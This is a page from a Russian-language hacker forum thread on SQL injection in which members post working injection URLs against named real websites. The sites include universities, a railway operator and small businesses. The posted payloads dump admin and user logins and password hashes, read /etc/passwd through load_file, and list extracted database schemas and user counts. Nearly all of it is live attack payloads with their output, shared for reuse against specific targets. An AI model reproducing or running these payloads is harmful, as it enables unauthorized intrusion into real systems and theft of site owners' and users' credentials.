SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://www.belaruslift.com/news.php?id=-23+union+select+1,group_concat(0x3a,login,password),3,4+from+admins--

    http://www.trkvolgamoll.ru/news.php?id=-23+union+select+1,2,group_concat(table_name),4+from+information_schema.tables--

    http://www.e-portal.com.ua/news.php?id=-23+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--
     
    #11221 Bramin, 28 Nov 2009
    Last edited: 28 Nov 2009
    1 person likes this.
  2. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Code:
    http://www.garylefevre.com/portfolio/portfolio.php?id=9+union+select+1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7,8,9
    user:[email protected]
    version:5.0.81-log
    database:db238807836
    OS:pc-linux-gnu
     
    1 person likes this.
  3. Pr0mo

    Pr0mo Member

    Joined:
    26 Nov 2009
    Messages:
    29
    Likes Received:
    31
    Reputations:
    4
    -1-
    target : hana-g.com
    Exploit: http://hana-g.com/pay.php?id=2&order=1+AND+1=2+UNION+SELECT+0,null,2,3,4--
    Database : d031f18ydb1
    User : d031f18y@localhost
    Version : 5.1.36-community-log
    Contain :

    [0]area: area_id,area_name,order,enabled,upd_date,ins_date
    [1]card_data: cdat_id,ctyp_id,prg_id,cnt_id,id,password,price,point,flag,insert_time,use_time,card_number,etc,env
    [2]card_price: prg_id,ctyp_id,price,enabled
    [3]card_type: ctyp_id,ctyp_name,sname,chr,chr2,order,enabled,upd_date,ins_date
    [4]ccheck_sid: sid,prg_id,cnt_id,price,card_number,time
    [5]center: cnt_id,prg_id,cnt_name,alph_name,area_id,order,enabled,tel,bank1,bank2,bank3,bank4,credit_val_zero,credit_val_mobile,upd_date,ins_date,abt_cnt_id
    [6]prefecture: id,name
    [7]pricashop: htencd,htenko,prefecture,city,shopname,tel,town,address,route,opens,closes,holiday,hanaf,hitof,manif,purf,adry
    [8]pricashop_old: htencd,htenko,prefecture,city,shopname,tel,town,address,route,opens,closes,holiday,hanaf,hitof,manif,purf,adry
    [9]program: prg_id,prg_name,sname,sname2,order,man_info,woman_info,woman_minfo,enabled,upd_date,ins_date,abt_prg_id
    [10]rog: rogid,rognm,rog1,rog2,insdt,upddt
    [11]settings: key,value
    Example:
    http://hana-g.com/pay.php?id=2&order=1+AND+1=2+UNION+SELECT+0,concat(cdat,0x3a,ctyp_id,0x3a,id,0x3a,password),2,3,4+from+card_data--


    -2-
    target : www.goldpoint.com.ar
    Exploit: http://www.goldpoint.com.ar/producto.php?id=67/**/and/**/1=2/**/union/**/select/**/1,2,3,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
    Database : ingelec_mailing
    User : ingelec@localhost
    Version : 5.0.85-community
    Contain :

    [0]news_emails: email_id,email_title,email_subject,email_body,email_identity
    [1]news_files: file_id,file_newsletter,file_file
    [2]news_groups: group_id,group_code,group_title,group_identity,group_date,group_description,group_system,group_public
    [3]news_history: history_id,history_newsletter,history_user,history_name,history_email,history_status,history_date,history_group
    [4]news_identities: person_id,person_name,person_email,person_signature,person_signature_html,person_phone,person_protect
    [5]news_newsletters: newsletter_id,newsletter_code,newsletter_problem,newsletter_group,newsletter_title,newsletter_date,newsletter_body_txt,newsletter_body_html,newsletter_sent,newsletter_overwrite,newsletter_signature,newsletter_from,newsletter_from_name,newsletter_misc_history,newsletter_misc_identity2,newsletter_misc_signature
    [6]news_users: user_id,user_status,user_confirm,user_group,user_date,user_name,user_email,user_type,user_company,user_address,user_city,user_state,user_zip,user_country,user_phone,user_fax,user_site,user_im_yahoo,user_im_msn,user_im_icq,user_im_aol,last_name,referrer,level
    [7]news_vars: name,value
    [8]site_mb_msg: msg_id,msg_type,msg_user,msg_date,msg_title,msg_from,msg_to,msg_body,msg_new,msg_delete
    [9]site_user_notes: note_id,note_title,note_body,note_relation,note_type,note_post_date,note_post_ip,note_post_user
    [10]site_users: user_id,user_login,user_password,user_name,user_address,user_city,user_state,user_zip,user_country,user_phone,user_email,user_email2,user_im_aol,user_im_icq,user_im_msn,user_im_yahoo,user_im_other,user_status,user_level,user_pending,user_date,last_login,last_ip,user_msg_send,user_msg_subject,user_protect_delete,user_protect_edit,user_group,user_role
    [11]site_vars: id,name,value
    Example:
    http://www.goldpoint.com.ar/producto.php?id=67/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(user_login,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+ingelec_mailing.site_users--



    -3-
    target : www.vivliokritiki.gr
    Exploit: www.vivliokritiki.gr/title.php?id=6+AND+1=2+UNION+SELECT+0,null,2,3,4,5,6,7,8,9,10,11--
    Database : vivlio
    User : [email protected]
    Version : 5.0.83-log
    Contain :

    [0]administrator: name,password
    [1]author: id,fname,lname
    [2]authorTitle: id,tid,aid
    [3]category: id,name
    [4]comments: id,tid,name,email,postdate,comments
    [5]guestBook: id,name,email,postdate,comments
    [6]publisher: id,house,address
    [7]publisherTitle: id,pid,tid,pdate,price,pages
    [8]title: id,cid,name,review,subtitle,reviewer
    [9]users: id,fname,lname,email,password,comments
    [10]verification: id,value
    Example:
    http://www.vivliokritiki.gr/title.php?id=6+AND+1=2+UNION+SELECT+0,concat(name,0x3a,password),2,3,4,5,6,7,8,9,10,11+from+administrator--



    -4-
    target : www.hemasolutions.com
    Exploit: http://www.hemasolutions.com/query.php?id=13+AND+1=2+UNION+SELECT+0,null,2,3,4,5,6,7,8,9--
    Databases :
    • hemasol_acc
    • hemasol_balkan
    • hemasol_balkanforum
    • hemasol_calculators
    • hemasol_hema
    • hemasol_leather
    • hemasol_mall
    • hemasol_vioenergy
    • hemasol_viva
    • hemasol_widget
    User : hemasol@localhost
    Version : 5.0.81-community-log
    Contain (hemasol_hema) :

    [0]downloaded: downloaded_id,downloaded_date,downloaded_file,downloaded_ip
    [1]downloads: downloads_id,downloads_name,downloads_lang,downloads_version,downloads_date,downloads_av,downloads_src,downloads_file,downloads_ext
    [2]faqs: faqs_id,faqs_date,faqs_question,faqs_answer
    [3]news: news_id,news_date,news_head,news_body,news_image,news_image_ext,news_lang
    [4]plans: plans_id,plans_owner,plans_template,plans_src,plans_date,plans_disp_style
    [5]pools: pools_id,pools_date,pools_ip,pools_q1,pools_a1,pools_q2,pools_a2,pools_q3,pools_a3
    [6]queries: queries_id,queries_owner,queries_date,queries_template,queries_args,queries_result
    [7]questions: questions_id,questions_name,questions_email,questions_date,questions_topic,questions_text
    [8]requests: requests_id,requests_date,requests_name1,requests_name2,requests_title,requests_email,requests_company,requests_address,requests_city,requests_state,requests_post,requests_country,requests_page,requests_info
    [9]reviews: reviews_id,reviews_date,reviews_head,reviews_body,reviews_lang,reviews_author,reviews_email,reviews_rating,reviews_approved,reviews_company
    [10]templates: templates_id,templates_name,templates_lang,templates_group,templates_owner,templates_email,templates_xml,templates_creation,templates_used,templates_active
    [11]users: users_id,users_name,users_pass,users_desc,users_country,users_city,users_address,users_tel,users_email,users_website,users_ip,users_lang,users_plans_left,users_download_allowed,users_created,users_active,users_agree
    [12]webmasters: webmasters_id,webmasters_name,webmasters_site,webmasters_ip,webmasters_css,webmasters_lang,webmasters_templates,webmasters_plans_left,webmasters_created
    [13]webplans: webplans_id,webplans_owner,webplans_user,webplans_template,webplans_short,webplans_src,webplans_date
    Example:
    http://www.hemasolutions.com/query.php?id=13+AND+1=2+UNION+SELECT+0,concat(users_name,0x3a,users_pass),2,3,4,5,6,7,8,9+from+hemasol_hema.users--
     
    #11223 Pr0mo, 28 Nov 2009
    Last edited: 29 Nov 2009
    2 people like this.
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    ТИЦ: 50
    PR: 4

    u_billiard@localhost@[email protected]@pc-linux-gnu

    эротический масаж :)
    .0.22:nefer_vladimir:nefer_vladimir@localhost:unknown-freebsd6.0

    MENU@category@config@config_cat@item@main

    атрибуты

    menu:
    idmenu@item@mat_id@root_id@por@item_ukr@item_eng@type

    category:
    cat_id@root_cat@name_cat@descr@sh_descr@img@por

    config:
    name_site@description@adminlogin@adminpass@id@meta

    config_cat:
    item_per_page@i_shop@email@add_img@money@id

    item:
    id@id_category@title@description@sh_description@price@hits@money_type@print_to_index@img@ad_img

    main:
    d@name@info@info_ukr@info_eng
     
    #11224 Strilo4ka, 28 Nov 2009
    Last edited: 29 Nov 2009
    1 person likes this.
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.bizarresoft.ro/produse_detalii.php?produs=-15+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14

    Database Version: 5.0.85-community-log
    Database name: bizarres_bizarres
    User name: bizarres_barabum@localhost
    Os : pc-linux-gnu
     
    1 person likes this.
  6. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.stimul-n.bg/site/advert.php?id=-4+union+select+1,2,group_concat(0x0b,column_name)+from+information_schema.columns+where+table_name=0x7573657273
    users::id:user,pass:email:perm
    http://www.stimul-n.bg/site/advert.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,user,0x3a,pass,0x3a,email,0x3a,perm)+from+users
    MySQL MySQL 5.0.32-Debian_7etch1-log
    ==========================================================
    http://ovbot.com/go.php?id=-4+union+select+group_concat(0x0b,column_name)+from+information_schema.columns+where+table_name=0x77705f7573657273
    wp_users:: ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name
    http://ovbot.com/go.php?id=-4+union+select+group_concat(0x0b,ID,0x3a, user_login,0x3a, user_pass,0x3a,user_email)+from+wp_users
    MySQL 5.0.81-community
     
    1 person likes this.
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    ZAXID.NET
    user:chatzaxid@localhost
    DB:chatzaxid
    version:5.1.37-log
    OS:unknown-linux-gnu

    нашы таблички:
    Code:
    banerz,banerz_groups,banerz_specials,banners,confdisclaimers,conferences,confusers,qa,urights
    атрибуты confusers:
    Code:
    uid,unick,upib,uemail,uicq,uworkplace,uposada,upass,banned
    пользователи:

    Всего 1595 пользователя!!!
     
    #11227 Strilo4ka, 30 Nov 2009
    Last edited: 30 Nov 2009
    1 person likes this.
  8. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    ------
     
    4 people like this.
  9. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Официальный сайт Южной железной дороги!
    вывод в теге <title>

    В даному случае скуль в оракле!

    таблица AAABBB

    Oracle
    пользователь PZ

    PZTAB

    пользователи
    Code:
    OUTLN
    SYS
    DBSNMP
    ...
    
    таблицы системного пользователя SYS
    Code:
    Dual
    AUDIT_ACTIONS
    
    доступ до DBA_USERS для пользователя под которым работает скрипт закрыт.

    Code:
    всесто limit rownum
    кавычки екранируються
    в запросе в скрыпте  один атрибут
    склейка так атрибут||chr(симовл асци)||..||..||..
    
     
    #11229 Strilo4ka, 30 Nov 2009
    Last edited: 30 Nov 2009
    2 people like this.
  10. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://aquatoriya.org/news.php?id=-5+union+select+1,2,group_concat(table_name),4,5,6+from+information_schema.tables--

    http://www.photobooth.net/art/index.php?artistID=-21+union+select+1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9--
     
    #11230 Bramin, 1 Dec 2009
    Last edited: 2 Dec 2009
  11. KNR

    KNR Member

    Joined:
    30 Oct 2009
    Messages:
    25
    Likes Received:
    7
    Reputations:
    0
    http://www.cfess.org.br/noticias_res.php?id=-22+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/*
     
    #11231 KNR, 1 Dec 2009
    Last edited: 1 Dec 2009
    1 person likes this.
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    5.0.87-log:catalogarenabel:catalogarenabel@localhost:portbld-freebsd7.2
    Code:
    partnerstehno_backs@partnerstehno_banners@partnerstehno_chapters@partnerstehno_counts@partnerstehno_cp_clons@partnerstehno_cp_links@partnerstehno_cp_linkstoclons@partnerstehno_letters@partnerstehno_links@partnerstehno_linkstocp@partnerstehno_scheduler@partnerstehno_templates@tehno_backs@tehno_banners@tehno_chapters@tehno_counts@tehno_cp_clons@tehno_cp_links@tehno_cp_linkstoclons@tehno_letters@tehno_links@tehno_linkstocp@tehno_scheduler@tehno_templates
    5.0.77:alphaav_bp:alphaav_dhsilabs@localhost:portbld-freebsd6.4
    tables:
    Code:
    category@prop
    prop columns:
    Code:
    no@dt@id@org@name@phone@email@typ@txt@conf
    category columns:
    Code:
    id@cat@des

    5.0.77:ccs-dc_org:[email protected]:redhat-linux-gnu

    таблицы
    content@session@user@version_link

    атрибуты user

    user_id@email@name@password@password_change@password_forgot_key@password_forgot_key_expire
     
    #11232 Strilo4ka, 2 Dec 2009
    Last edited: 2 Dec 2009
    1 person likes this.
  13. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    http://www.geotunis.org/index_en.php?id=-5++union+select+1,2,3,4,5,6,7,8--

    http://www.alfajer.com/company_details.php?ID=-7+union+select+1,2,3,4,5,6,7,8,9,10--
     
    #11233 Fooog, 2 Dec 2009
    Last edited: 3 Dec 2009
    2 people like this.
  14. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    558
    Likes Received:
    289
    Reputations:
    42
    http://www.huesler-nest.ch/en/news.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--
    5.0.32-Debian
    huesler@localhost

    http://www.esoterica.ru/news.php?id=-22+union+select+1,2,3,4,5--
    ТИЦ 170.
     
    #11234 .Varius, 3 Dec 2009
    Last edited: 29 Jun 2010
    3 people like this.
  15. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    http://tdes.nnov.ru/thumbnails.php?id=-980+union+select+1,2,3,4,5,6,7,8,9,0,1,2,table_name,4,5+from+information_schema.tables+limit+19,1%20--&page=0
     
  16. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.sanfordwomenshealth.org/staff/index.php?id=&entryid=-3+union+select+1,2,3,4,5,6,7,table_name,9,10+from+information_schema.tables+/*+
    Code:
    http://www.trailking.com/news/index.php?newsid=-2+union+select+1,2,3,4,5,6,7,8,9+--+
    Code:
    http://www.ve4erina.ru/services/index.php?n=-3+union+select+1,user()+--+&id=27
    Code:
    http://www.computertoday.net/magazine.php?mag=WinMag&mag_no=-166+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a3a,username,password,email))),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+phpuserlogin_users+/*+&backyear=2007'

    Code:
    http://www.hydrix.com/services/index.php?id=27+union+select+1,2,3,4,5,6,7,8,9+--+
     
    3 people like this.
  17. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    barrettos.info

    Code:
    http://www.barrettos.info/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+select+1,1,1,1,1,1,1,concat_ws(0x3a,id,usertype,username,password),1,1,1,1,1,1,1,1+from+jos_users+--
    Code:
    5.1.30:barrett2_jo151@localhost:barrett2_jo151
    hilsonmoormanfamily.com

    Code:
    http://www.hilsonmoormanfamily.com/login/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+select+1,1,1,version%28%29,1,1,1,concat%28username,0x3a,password%29,1,1,1,1,1,1,1,1+from+jos_users--
    Code:
    5.0.81-community:hilsonm1_jo151@localhost:hilsonm1_jo151
     
    #11237 nemaniak, 4 Dec 2009
    Last edited: 5 Dec 2009
    1 person likes this.
  18. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    ----------------------------
     
    1 person likes this.
  19. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://www.elps.hs.iastate.edu/news.php?id=-12+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables--
    смотрим колонки в таблице wp_users
    http://www.elps.hs.iastate.edu/news.php?id=-12+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from +information_schema.columns+where+table_name=0x77705F7573657273--

    ещё еда:

    http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2F6574632F706173737764),3,4,5--

    http://mtucrt.students.mtu.edu/index.php?id=-12+union+select+1,concat_ws(user(),database()%20,version(),@@version_compile_os),3,4,5,6,7--
     
    #11239 Bramin, 5 Dec 2009
    Last edited: 5 Dec 2009
    2 people like this.
  20. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    хорошенький сайт)

    Code:
    http://www.modifiedstreetcars.com/girls.php?Hot%20Girl%20on%20Peugeot%20Bonnet&id=-100+union+select+1,2,3,unhex%28hex%28group_concat%280x3a,member_id,0x3a,username,0x3a,password,0x3a,email%29%29%29,5,6,7,8,9+from+members--
     
    1 person likes this.
Thread Status:
Not open for further replies.